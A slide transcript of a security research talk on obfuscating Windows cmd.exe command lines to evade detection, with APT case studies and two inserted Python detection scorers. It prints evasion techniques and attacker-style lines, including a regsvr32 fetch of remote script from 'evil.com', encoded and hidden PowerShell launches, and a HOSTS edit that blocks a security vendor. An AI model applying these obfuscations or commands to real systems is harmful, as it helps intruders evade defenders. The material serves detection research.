Invoke-DOSfuscation - Hack In Paris (slide transcript)
Page 1
Daniel Bohannon
@danielhbohannon
Senior Applied Security Researcher
Mandiant, A FireEye Company
COPYRIGHT © 2018, FIREEYE, INC. ALL RIGHTS RESERVED.
Invoke-DOSfuscation: Techniques FOR %F IN (-style) DO (S-level CMD Obfuscation)
Page 2
• Daniel Bohannon
• Title :: Senior Applied Security Researcher
• Team :: Advanced Practices Team @ Mandiant/FireEye
• Twitter :: @danielhbohannon
• Blog :: http://danielbohannon.com
• Projects
• Invoke-Obfuscation & Invoke-CradleCrafter
• Revoke-Obfuscation (w/@Lee_Holmes)
• Invoke-DOSfuscation
C:\> """who""am"i
Page 3
DISCLAIMER: Case studies and examples are drawn from our experiences and activities working for a variety of customers, and do not represent our work for any one customer or set of customers. In many cases, facts have been changed to obscure the identity of our customers and individuals associated with our customers.
Page 4
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 5
OUTLINE
C:\> State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 6
State of Obfuscation [Red Team]
• Why Obfuscate?
• Evade static (and some dynamic) detections
• Increase work for defenders
• How Extensive?
• Some obfuscation framework exists for almost any scripting language that attackers like to use
• Slowing down?
• Not any time soon (but I may be biased)
Not The Droid You're Looking For
Page 7
State of Obfuscation [Blue Team]
• Additional Host-Based Visibility
• AMSI: Antimalware Scan Interface
• ETW: Event Tracing (Windows)
• Signature-less Detection Approaches
• Revoke-Obfuscation (AST-based PowerShell obfuscation detection framework)
• Room for improvement?
• Absolutely, because attackers are responding by…
Page 8
State of Obfuscation [Attacker Response]
• Choosing softer targets
• Disabling defensive visibility
• AMSI, ETW, Anti-forensics
• Using languages that do not provide good visibility
• JavaScript (quieter than PS, but still AMSI)
• AMSI visibility if run via Windows Script Host (VBS or JScript)
• C# (msbuild.exe all the things)
• Custom binaries (b/c whitelisting still uncommon)
Page 9
State of Obfuscation [My Response]
• What is this talk?
• NOT PowerShell (well, not entirely)
Page 10
State of Obfuscation [My Response]
• What is this talk?
• NOT PowerShell (well, not entirely)
• Cmd.exe obfuscation
• Cmd.exe visibility
• Command line arguments
• Parent/child process relationships
• Source of action on registry, files, etc.
But why an entire framework for cmd.exe obfuscation?
Page 11
OUTLINE
State of the Union Obfuscation
C:\> Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 12
Obfuscation in the Wild
• June 30, 2017
• Co-authored blog post with Nick Carr (@itsreallynick)
• Outlines three different obfuscation techniques that MANDIANT consultants identified three threat actors using
• Feb 2017 :: FIN8
• Apr 2017 :: APT32 (OceanLotus, Vietnam)
• Jun 2017 :: FIN7 (Carbanak)
Page 13
Case Study #1: FIN8
• February 2017
• Process-level environment variables + PowerShell StdIn (launched from macro)
cmd /c echo %_MICROSOFT_UPDATE_CATALOG% | %_MICROSOFT_UPDATE_SERVICE%
$s=$Env:_CT;$o='';$l=$s.length;$i=$Env:_PA%$l;while($o.length -ne$l){$o+=$s[$i];$i=($i+$Env:_KE)%$l}iex($o)
powershell -
Page 14
Case Study #2: APT32 (OceanLotus)
• April 2017
• Caret and un-paired double quotes in regsvr32.exe arguments
• /i:^h^t^t^p (does not show up in regsvr32.exe arguments)
• /i:"h"t"t"p (DOES show up in regsvr32.exe arguments – must be even number of quotes)
Host Investigative Platform (HIP) capturing real-time attacker activity during a MANDIANT incident response engagement for APT32 activity
Page 15
Case Study #3: FIN7 (Carbanak)
• June 2017
• DOCX/RTF + LNK w/Word COM to retrieve remaining payload from original document
• Process-level environment variables + cmd.exe StdIn
• JavaScript encoding & concatenation:
• "Wor"+"d.Application" and [String.fromCharCode(101)+'va'+'l']
Page 16
Case Study #3: FIN7 (Carbanak)
Page 17
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
Page 18
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
Process-level env var (set x=… and %x%)
Page 19
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wscript /e:jscript … echo %x%|cmd
Garbage delimiter
Page 20
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:jscript … echo %x%|cmd
Garbage delimiter
Page 21
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
Garbage delimiter
Page 22
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x%|cmd
Garbage delimiter / Delimiter removal
Page 23
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x %|cmd
Garbage delimiter / Delimiter removal
Page 24
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
Garbage delimiter / Delimiter removal
Page 25
Case Study #3: FIN7 (Carbanak)
• cmd.exe /c set x=wsc@ript /e:js@cript … echo %x:@=%|cmd
Page 26
Case Study #3: FIN7 (Carbanak)
• Timeline
• Wed :: June 28, 2017 – Nick Carr (@itsreallynick) finds FIN7 testing payload
• Thu :: June 29, 2017 – We write blog post
• Fri :: June 30, 2017 – We publish blog post
• Sat/Sun :: July 1-2, 2017 – I write and release POC: Out-FINcodedCommand
Page 27
Case Study #3: FIN7 (Carbanak)
"Is there more here?"
Page 28
Implications of This Research
• These obfuscation techniques affect:
• Dynamic detections
• Arguments, parent/child relationship, env var, stdin
• Static detections
• All of the above + so much more
• CFP submissions ☺
SO YOU THINK EVENT LOGS DEOBFUSCATE CMD ARGS
PLEASE, TELL ME MORE ABOUT YOUR TESTING
Page 29
Implications of This Research
cmd.exe /c "echo Invoke-DOSfuscation"
Page 30
Implications of This Research
cmd.exe /c "set O=fuscation&set B=oke-DOS&&set D=echo Inv&&call %D%%B%%O%"
Page 31
Implications of This Research
cm%windir:~ -4, -3%.e^Xe,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o^%"
Page 32
Implications of This Research
FOR /F "delims=il tokens=+4" %Z IN ('assoc .cdxml') DO %Z ,;^,/^C",;,S^Et ^ ^o^=fus^cat^ion&,;,^se^T ^ ^ ^B^=o^ke-D^OS&&,;,s^Et^ ^ d^=ec^ho I^nv&&,;,C^Al^l,;,^%^D%^%B%^%o%"
Page 33
Implications of This Research
^F^oR , , , , , ; ; /^f ; ; ; ; ; , " delims=il tokens= +4 " ; ; ; , , , , %Z ; , , , , ^In , , ; ; , , , ( , ; ; ; ' , , , , , ; ^^a^^S^^s^^oC ; , , , , ; .c^^d^^xm^^l ' ; , , , , ) , , , , ; , ^d^o , , , , , , , %Z , ; ^ ,/^C" , ; , S^Et ^ ^o^=fus^cat^ion& , ; , ^se^T ^ ^ ^B^=o^ke-D^OS&& , ; , s^Et^ ^ d^=ec^ho I^nv&& , ; , C^Al^l , ; , ^ %^D%^%B%^%o%"
Page 34
Implications of This Research – HANG ON TIGHT
Page 35
Implications of This Research – HANG ON TIGHT AS WE STACK
Page 36
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
C:\> Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 37
Whose Binary is it Anyway: Obfuscating Binary Names
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
Page 38
Whose Binary is it Anyway: Obfuscating Binary Names
• Rename/copy cmd.exe
• Cmd.exe substitutes (kind of)
• forfiles.exe (@vector_sec)
• pcalua.exe
• scriptrunner.exe (@KyleHanslovan -- Win10+)
• https://gist.github.com/api0cradle/8cdc53e2a80de079709d28a2d96458c2
• Syntactical obfuscation of legitimate binary name?
Page 39
Whose Binary is it Anyway: Obfuscating Binary Names
• Env var encoding
• Nothing new
• Resolves on command line
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
C:\> %ProgramData:~0,1%%ProgramData:~9,2%
CmD
C:\> %ProgramData:~3,1%%ProgramData:~5,1%we%ProgramData:~7,1%she%Public:~12,1%%Public:~12,1%
Powershell
Page 40
Whose Binary is it Anyway: Obfuscating Binary Names
• Something that does NOT resolve on the command line (i.e. internal commands)
• SET
• ASSOC
• FTYPE
Page 41
Whose Binary is it Anyway: Obfuscating Binary Names
• Using SET to produce the string PowerShell
Page 42
Whose Binary is it Anyway: Obfuscating Binary Names
• Using SET to produce the string PowerShell
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
Page 43
Whose Binary is it Anyway: Obfuscating Binary Names
• Using SET to produce the string PowerShell
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
Tokens 1-13 when that line is split on s and \ (runs of delimiters collapse): 1=PSModulePath=C: 2=Program File 3=Window 4=PowerShell 5=Module 6=;C: 7=Window 8=y 9=tem32 10=Window 11=PowerShell 12=v1.0 13=Module
Page 44
Whose Binary is it Anyway: Obfuscating Binary Names
• Using SET to produce the string PowerShell
PSModulePath=C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules
Required (case-sensitive) delimiters are: s and \
cmd.exe /c "FOR /F "delims=s\ tokens=4" %a IN ('set^|findstr PSM')DO %a"
Page 45
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
C:\> Deep Dive: Character Insertion Obfuscation
Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 46
Deep Dive: Character Insertion Obfuscation
• Typically more useful for evading static analysis detections rather than dynamic detections
• Caret escape character (^)
• Double quotes, evenly balanced ("")
• Encapsulating parentheses
• Leading & trailing special characters
• Standard input argument hiding
"C:\WINDOWS\system32\cmd.exe" /c P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC IAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHk…
regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll
,cmd;/ccalc
cmd /c echo calc|cmd
Page 47
Deep Dive: Character Insertion Obfuscation
• Typically more useful for evading static analysis detections rather than dynamic detections
• Nonexistent env vars (batch files)
• https://marcin-chwedczuk.github.io/obfuscating-windows-batch-files
• Custom env vars
• Existing env vars
..\..\..\WINDOWS\system32\cmd.exe /V /K set p=p&&!p!owershell -w hidden -c "IEX ((('Q0zF='+'Q0z'+'env:T'+'emp+'+'zARYUEyjv'…
echo "Find Evil!" → ec%a%ho "Fi%b%nd Ev%c%il!"
C:\> echo %ProgramData%
C:\ProgramData
C:\> echo %ProgramData:~0,1%%ProgramData:~9,2%
CmD
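As an added example (not part of the deck), the following scores logged command lines for the static indicators of the insertion and env-var layers shown on the two slides above: carets, inline quotes, ,; delimiter runs, %VAR:~ substrings, %VAR:old=new% substitution, FOR /F over SET/ASSOC/FTYPE output, set-then-call staging and stdin piping into cmd. The indicator weights, caps and threshold are assumptions to tune against real telemetry, and the sample lines are constructed from the forms on the slides with the base64 and URL replaced by placeholders.

```python
"""Static indicators for the cmd.exe obfuscation layers shown on the slides,
scored over constructed process-creation command lines.  Example detection
logic, not the talk's own material; weights, caps and the threshold are
assumptions to tune against your own telemetry."""
import re

# name -> (pattern, weight per counted match, cap on counted matches)
INDICATORS = {
    # caret escape inserted between characters: P^o^w^e^r
    "caret": (re.compile(r"\^"), 1, 5),
    # double quote splitting a word in two: /i:"h"t"t"p
    "inline_quote": (re.compile(r'[A-Za-z0-9]"[A-Za-z0-9]'), 2, 3),
    # runs of the , and ; separators cmd skips: ,;^,/^C
    "delimiter_run": (re.compile(r"[,;]\s*[,;]"), 2, 3),
    # env var substring: %ProgramData:~0,1% (one use is a common admin idiom)
    "env_substring": (re.compile(r"%[^%:]+:~\s*-?\d+"), 2, 3),
    # env var substitution: %x:@=%
    "env_substitution": (re.compile(r"%[^%:]+:\*?[^%=]+=[^%]*%"), 2, 3),
    # FOR /F with delims/tokens (legitimate in admin scripts, so low weight)
    "for_f_delims": (re.compile(r'for\s+/f\s+"[^"]*(?:delims|tokens)=', re.I), 1, 1),
    # ...but harvesting tokens from SET/ASSOC/FTYPE output, which never
    # resolves on the command line, is the binary-name trick from the slides
    "for_f_internal": (re.compile(r"in\s*\(\s*'[^']*\b(?:set|assoc|ftype)\b", re.I), 3, 1),
    # payload staged in process env vars, then re-expanded by call or echo
    "set_then_call": (re.compile(r"\bset\s+[^=&]+=.*&+.*\b(?:call|echo)\b.*%", re.I), 2, 1),
    # command handed to a child cmd.exe over stdin instead of arguments
    "stdin_cmd": (re.compile(r"\|\s*cmd(?:\.exe)?\s*$", re.I), 2, 1),
}
THRESHOLD = 3  # assumed: one caret or one %date:~0,4% stays below it


def score(cmdline):
    """Return (score, hits); hits maps indicator name -> raw match count."""
    hits, total = {}, 0
    for name, (rx, weight, cap) in INDICATORS.items():
        n = len(rx.findall(cmdline))
        if n:
            hits[name] = n
            total += weight * min(n, cap)
    return total, hits


def is_suspicious(cmdline, threshold=THRESHOLD):
    return score(cmdline)[0] >= threshold


# Constructed process-creation command lines: benign admin usage first, then
# the forms shown on the slides (base64 and URL replaced by placeholders).
SAMPLE_LOG = [
    r'"C:\Windows\system32\cmd.exe" /c dir /b C:\Users',
    r"cmd /c echo %USERPROFILE%\Desktop",
    "for /f \"tokens=2 delims==\" %a in ('wmic os get caption /value') do echo %a",
    r'"C:\WINDOWS\system32\cmd.exe" /c P^o^w^e^r^S^h^e^l^l^.^e^x^e^ -NoExit -Exec Bypass -EC <BASE64-ELIDED>',
    r'regsvr32.exe /s /n /u /i:"h"t"t"p://<REDACTED>.jpg scrobj.dll',
    r"%ProgramData:~0,1%%ProgramData:~9,2% /c echo test",
    r"cmd.exe /c set x=wsc@ript /e:js@cript&&echo %x:@=%|cmd",
    "cmd.exe /c \"FOR /F \"delims=s\\ tokens=4\" %a IN ('set^|findstr PSM')DO %a\"",
]

if __name__ == "__main__":
    for line in SAMPLE_LOG:
        total, hits = score(line)
        verdict = "SUSPICIOUS" if total >= THRESHOLD else "ok"
        print(f"{verdict:10} {total:2d} {hits} {line}")
```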
Page 48
Deep Dive: Character Insertion Obfuscation
• Out-FINcodedCommand POC
• A few binary syntax options with environment variable character substitution
Page 49
Deep Dive: Character Insertion Obfuscation
Page 50
Deep Dive: Character Insertion Obfuscation (ITW 1/3)
• Env var encoding in the wild
• SHA-256: 661877d416f34411fad7e22246ee0d61d14de3065a34b0a7b2f28052d56db6e2
%comspec:~-16,1%%comspec:~-1%%comspec:~-13,1% decodes to set
Page 51
Deep Dive: Character Insertion Obfuscation (ITW 2/3)
• Env var encoding in the wild
• SHA-256: 9e1df42f00829d16afd97c575f08da45467bbcab92ca5e3d2832a009dddaa8a7
• Obfuscator: https://github.com/guillaC/JSBatchobfuscator
Screenshot annotations: "Set full alphabet in custom env var" / "DECODED"
Page 52
Deep Dive: Character Insertion Obfuscation (ITW 3/3)
• Env var encoding in the wild
• SHA-256: 761483906b45fad51f3c7ab66b1534dee137e93a52816aa270bc97249acb56d0 (see white paper!)
Screenshot annotations: "Set env var called ' (single quote) with known env var substrings" / "Assemble payload as substrings from newly-set ' env var"
Page 53
OUTLINE
State of the Union Obfuscation
Obfuscation in the Wild: 3 Case Studies
Whose Binary is it Anyway: Obfuscating Binary Names
Deep Dive: Character Insertion Obfuscation
C:\> Deep(er) Dive: Advanced Payload Obfuscation
Invoke-DOSfuscation Demo
Detecting DOSfuscation
Page 54
Deep(er) Dive: Advanced Payload Obfuscation
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
Annotated in three parts: cmd.exe (%COMSPEC%), setup portion (/b /c start /b /min), rest of the command (netstat -ano | findstr LISTENING)
Page 55
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
• %COMSPEC% :: env var for "C:\Windows\system32\cmd.exe"
• /b :: exits cmd.exe to calling program with specified process exit code
• /c :: remainder of command line processed as a command
• start :: execute remaining command without waiting for it to finish
• /b :: (same as before but for second command)
• /min :: start window minimized
55
Deep(er) Dive: Advanced Payload Obfuscation
• %COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING
56-60
Deep(er) Dive: Advanced Payload Obfuscation
• Env var substring (the value of %COMSPEC% is 27 chars):
• %COMSPEC:~0%
• %COMSPEC:~0,27%
• %COMSPEC:~-27%
• %COMSPEC:~-27,27%
• %COMSPEC:~0,1337%
• %COMSPEC:~-1337%
• %COMSPEC:~-1337,1337%
• Env var substitution:
• %COMSPEC:\=/%
• %COMSPEC:KeepMatt=Happy%
• %COMSPEC:*System32\=%
• %COMSPEC:*Tea=Coffee%
61
• Env var substring :: %COMSPEC:~0,27%
• Env var substitution :: %COMSPEC:\=/%
62
• Random Case :: %coMSPec:~0,27% and %coMSPec:\=/%
63
• Whitespace :: %coMSPec:~ 0, 27% and %coMSPec: \ = / %
64
• Explicit signing :: %coMSPec:~ -0, +27% (and %coMSPec: \ = / %)
65
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / % /b /c start /b /min netstat -ano | findstr LISTENING
66
• Context is crucial
• ✔ Cmd.exe
• ✔ WScript.Shell
• ✘ Service
• ✘ Run key
• ✘ Scheduled task
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -aNo | fiNDstr LISTENING
67
• Random case
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
68
C:\Windows\system32\cmd.exe /B/csTArt/b/mIN neTSTat -aNo
NOTE: Single whitespace is added to process arguments.
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -aNo|fiNDstr LISTENING
69
Netstat's -ano arg reordering
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / %/B/csTArt/b/mIN neTSTat -Noa|fiNDstr LISTENING
70
Netstat's -ano arg reordering
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
• %coMSPec: \ = / % /B /c sTArt /b /mIN neTSTat -Noa | fiNDstr LISTENING
71
• Random case
• Whitespace (-/+)
Deep(er) Dive: Advanced Payload Obfuscation
• ,;,%coMSPec: \ = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr LISTENING
72
• Random case
• Whitespace (-/+)
• Comma & semicolon
Deep(er) Dive: Advanced Payload Obfuscation
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING
73
Let's look at process execution layers & respective arguments!
• Random case
• Whitespace (-/+)
• Comma & semicolon
• Caret
Deep(er) Dive: Advanced Payload Obfuscation
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^STat ^^^^ ^^^^-N^^^^oa ^^^^ ^|,;,fi^^^NDstr LIST^^^ENING
74-75
Process execution layers (one command line per process):
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^STat ^^ ^^-N^^oa ^^ |,;,fi^NDstr LIST^ENING
C:\Windows\system32\cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^STat ^ ^-N^oa ^ "
neTSTat -Noa
fiNDstr LISTENING
, ; and ^ do NOT persist into final netstat & findstr commands. Is there another obfuscation character?
Deep(er) Dive: Advanced Payload Obfuscation
• ,;,%coMSPec:^^^^\^^^^=^^^^/^^^^%^ ,;,^^^^/^^^^B^^^^,;,^^^^/^c,;,^^sT^^Art^^,;,/^^^^b ^^^^ ,;/^^^^mIN^^^^ ,;neT^^^^ST""at ^^^^ ^^^^-N^^^^o""a ^^^^ ^|,;,fi^^^ND""str LIST^^^EN""ING
76
Process execution layers (one command line per process):
C:\Windows\system32\cmd.exe ,;,^^/^^B^^,;,^^/c,;,^sT^Art^,;,/^^b ^^ ,;/^^mIN^^ ,;neT^^ST""at ^^ ^^-N^^o""a ^^ |,;,fi^ND""str LIST^EN""ING
C:\Windows\system32\cmd.exe /S /D /c" sTArt,;,/^b ^ ,;/^mIN^ ,;neT^ST""at ^ ^-N^o""a ^ "
neTST""at -No""a
fiND""str LISTEN""ING
YES! Double quotes are widely-accepted obfuscation characters. (, ; and ^ are binary-specific)
Deep(er) Dive: Advanced Payload Obfuscation
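Turning the persistence observation above into something a detection engineer can run: the Python below is an added example, not code from the talk or from the Invoke-DOSfuscation project. It counts, in one logged command line, the obfuscation traits walked through on the preceding slides (carets, comma/semicolon runs, empty double quotes, env var substring/substitution syntax, random case in known keywords, set-then-call concatenation) and turns them into a score. The KEYWORDS list, the WEIGHTS, the THRESHOLD and the SAMPLES are constructed for this example; several samples are copied from the slides.

```python
"""Score a logged command line for DOSfuscation-style traits.

Added example for detection engineers; not code from the talk or from the
Invoke-DOSfuscation project. Weights and threshold are constructed starting
points, meant to be tuned against a real baseline of command lines.
"""
import re

# Constructed list: keywords whose casing is compared with canonical forms
# (all lower, all upper, or Capitalised). Names such as WScript or PowerShell
# are legitimately mixed case, so only listed words are checked.
KEYWORDS = {"cmd", "comspec", "set", "call", "echo", "start",
            "netstat", "findstr", "powershell"}

_SEPARATOR_RUN = re.compile(r"[,;]{2,}")                 # ,;, used in place of spaces
_ENV_TRICK = re.compile(r"%[^%:]+:(?:~|[^%]*=)[^%]*%")    # %V:~..% or %V:x=y% / %V:*x=y%
_SET_THEN_CALL = re.compile(r"\bset\s+[^=&]+=[^&]*&&.*\bcall\b", re.IGNORECASE)
_WORD = re.compile(r"[A-Za-z]+")

WEIGHTS = {"carets": 1, "empty_quotes": 3, "separator_runs": 2,
           "env_tricks": 3, "mixed_case": 2, "set_then_call": 4}
THRESHOLD = 4

# Constructed sample command lines (most copied from the slides above).
BASELINE = "netstat -ano | findstr LISTENING"
SAMPLES = {
    "plain_comspec": "%COMSPEC% /b /c start /b /min netstat -ano | findstr LISTENING",
    "comma_semicolon": r',;,%coMSPec: \ = / %,;,/B,;,/c,;,sTArt,;,/b ,;/mIN ,;neTSTat -Noa |,;,fiNDstr LISTENING',
    "child_netstat": 'neTST""at -No""a',
    "concat": 'cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"',
}


def _is_canonical_case(word):
    return word.islower() or word.isupper() or (word[0].isupper() and word[1:].islower())


def extract_features(cmdline):
    """Return per-trait counts for one command line."""
    # Empty double quotes vanish at expansion, so drop them before looking at
    # word casing; that is what reunites neTST""at into neTSTat.
    dequoted = cmdline.replace('""', "")
    mixed = sum(1 for w in _WORD.findall(dequoted)
                if w.lower() in KEYWORDS and not _is_canonical_case(w))
    return {
        "carets": cmdline.count("^"),
        "empty_quotes": cmdline.count('""'),
        "separator_runs": len(_SEPARATOR_RUN.findall(cmdline)),
        "env_tricks": len(_ENV_TRICK.findall(cmdline)),
        "mixed_case": mixed,
        "set_then_call": 1 if _SET_THEN_CALL.search(cmdline) else 0,
    }


def score(cmdline):
    """Weighted sum of the trait counts."""
    return sum(WEIGHTS[name] * count for name, count in extract_features(cmdline).items())


def is_suspicious(cmdline, threshold=THRESHOLD):
    return score(cmdline) >= threshold


def triage(cmdlines):
    """Map each command line to (score, flagged) for a batch of log records."""
    return {line: (score(line), is_suspicious(line)) for line in cmdlines}


if __name__ == "__main__":
    for line, (points, flagged) in triage([BASELINE, *SAMPLES.values()]).items():
        print(f"{points:3d} {'FLAG' if flagged else '    '} {line}")
```

Because `""` survive into the child processes while `,`, `;` and `^` do not, the empty-quote count is worth applying to the netstat and findstr command lines as well, not only to the parent cmd.exe; the keyword-based casing check is narrow on purpose, since random case in a known binary name is a far stronger signal than mixed case in arbitrary arguments.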
• Invoke-DOSfuscation supports and randomizes all of these obfuscation components
• For obfuscating final cmdline arguments:
• User-input command (e.g. netstat -ano) must be obfuscated manually (, ; ^ "" etc.)
• Invoke-DOSfuscation handles all layers of escaping for input obfuscation characters
77
INSANELY complicated in certain scenarios, especially since there is no tokenizer for cmd.exe like there is for PowerShell.
Deep(er) Dive: Advanced Payload Obfuscation
• What cmd.exe commands do attackers use that do NOT create child processes?
• File copy: cmd /c copy powershell.exe benign.exe
• File deletion: cmd /c del benign.exe
• File creation: cmd /c "echo LINE1 > bad.vbs&&echo LINE2 >> bad.vbs"
• File read: cmd /c type HOSTS
• File modification: cmd /c "echo 127.0.0.1 cloud.security-vendor.com >> HOSTS"
• File listing: cmd /c dir "C:\Program Files\*"
• Dir creation: cmd /c mkdir %PUBLIC%\Recon
• Symbolic link creation: cmd /c mklink ClickMe C:\Users\Public\evil.exe
80
Deep(er) Dive: Advanced Payload Obfuscation
• Perhaps your target is monitoring for carets, commas, semicolons, etc.
• What additional obfuscation options does cmd.exe give us?
1.
2.
3.
4.
81
Deep(er) Dive: Advanced Payload Obfuscation
• cmd /c netstat -ano
82-91
Payload Obfuscation 1 of 4: Concatenation
– and / interchangeability
• cmd /c netstat /ano
• More examples:
• wscript.exe /nologo … → wscript.exe -nologo …
• powershell.exe -nop -noni -enc … → powershell.exe /nop /noni /enc …
• regsvr32.exe /s /n /u /i:https://evil.com/a scrobj.dll → regsvr32.exe -s -n -u -i:https:\\evil.com\a scrobj.dll
• cmd /c "set com=netstat /ano&&echo %com%"
92-93
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com=netstat /ano&&call %com%"
94-95
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%"
96
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%"
97
DETOUR #TestYourTools:
• Sysmon EID 1 CommandLine adds duplicate %'s
• EventVwr.exe
• PowerShell's Get-WinEvent
http://www.danielbohannon.com/blog-1/2018/3/19/test-your-dfir-tools-sysmon-edition
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com1=net&&set com2=stat&&set com3= /ano&&call %com1%%com2%%com3%"
98
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call %com1%%com2%%com3%"
99
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"
100
• Reorder substrings
• Set into single final env var
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set final=%com1%%com2%%com3%&&call %final%"
101-106
Final syntax :: Invoke-DOSfuscation arguments
1. call %final% :: (default when possible)
2. cmd /c %final% :: -FinalBinary cmd
3. call echo %final% | cmd :: -FinalBinary cmd -StdIn
4. call powershell "%final%" :: -FinalBinary PowerShell
5. call echo %final% | powershell - :: -FinalBinary PowerShell -StdIn
Payload Obfuscation 1 of 4: Concatenation
• cmd /c "set com3= /ano&&set com2=stat&&set com1=net&&call set
final=%com1%%com2%%com3%&&call %final%"
107
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
Payload Obfuscation 1 of 4: Concatenation
![Page 108: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/108.jpg)
• CMd /C "sEt coM3= /ano&&SEt cOm2=stat&&seT CoM1=net&&caLl SeT fiNAl=%COm1%%cOm2%%coM3%&&cAlL %FinAl%"
108
Invoke-DOSfuscation functions also wrap all the building block techniques into each input command…
• Random case
Payload Obfuscation 1 of 4: Concatenation
![Page 109: Invoke-DOSfuscation - Hack In Paris · • Invoke-DOSfuscation handles all layers • Invoke-DOSfuscation supports and randomizes all of these obfuscation components • File copy:](https://reader033.vdocuments.net/reader033/viewer/2022042013/5eb60f8327e97a450566ae9f/html5/thumbnails/109.jpg)
